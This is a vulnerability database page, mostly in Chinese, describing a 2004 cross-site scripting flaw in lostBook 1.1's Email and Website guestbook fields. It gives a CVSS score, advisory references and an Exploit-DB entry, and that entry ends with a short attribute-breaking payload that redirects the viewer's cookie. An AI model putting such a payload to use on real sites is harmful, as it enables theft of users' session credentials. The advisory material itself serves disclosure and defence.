发布时间 :2004-07-29 00:00:00
修订时间 :2016-10-17 23:05:52

[原文]Cross-site scripting (XSS) vulnerability in lostBook 1.1 and earlier allows remote attackers to inject arbitrary web script via the (1) Email or (2) Website fields.

[CNNVD]Verylost LostBook消息项目HTML注入漏洞(CNNVD-200407-095)

        lostBook 1.1以及之前的版本存在跨站脚本攻击(XSS)漏洞。远程攻击者借助(1) Email或(2) Website字段注入任意web脚本。

- CVSS (基础分值)

CVSS分值: 4.3 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BUGTRAQ  20040729 lostBook v1.1 Javascript Execution
(VENDOR_ADVISORY)  XF  lostbook-email-website-xss(16835)

- 漏洞信息

Verylost LostBook消息项目HTML注入漏洞
中危 跨站脚本
2004-07-29 00:00:00 2006-06-15 00:00:00
        lostBook 1.1以及之前的版本存在跨站脚本攻击(XSS)漏洞。远程攻击者借助(1) Email或(2) Website字段注入任意web脚本。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: .

- 漏洞信息 (24333)

Verylost LostBook 1.1 Message Entry HTML Injection Vulnerability (EDBID:24333)
php webapps
2004-07-29 Verified
0 Joseph Moniz
N/A [点击下载]

Reportedly Verylost lostBook is affected by an HTML injection vulnerability in its message entry functionality. This issue is due to a failure of the application to properly validate and sanitize user-supplied input before including it in dynamically generated web page content.

This may allow an attacker inject malicious HTML and script code into the application. An unsuspecting user viewing the post will have the attacker-supplied script code executed within their browser in the context of the vulnerable site. This issue may be leverage to steal cookie based authentication credentials. Other attacks are also possible." onload="document.location=''+document.cookie		

- 漏洞信息

lostBook Guest Book Multiple Field Script Insertion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

lostBook contains a flaw that allows a remote attacker to inject arbitrary Javascript code. This flaw exists because the application does not validate user-supplied input to the 'email' and 'website' fields before being included in guest book entries. This could allow a remote attacker to create a specially crafted URL that would execute arbitrary Javascript code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

- 时间线

2004-07-29 Unknow
2004-07-29 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者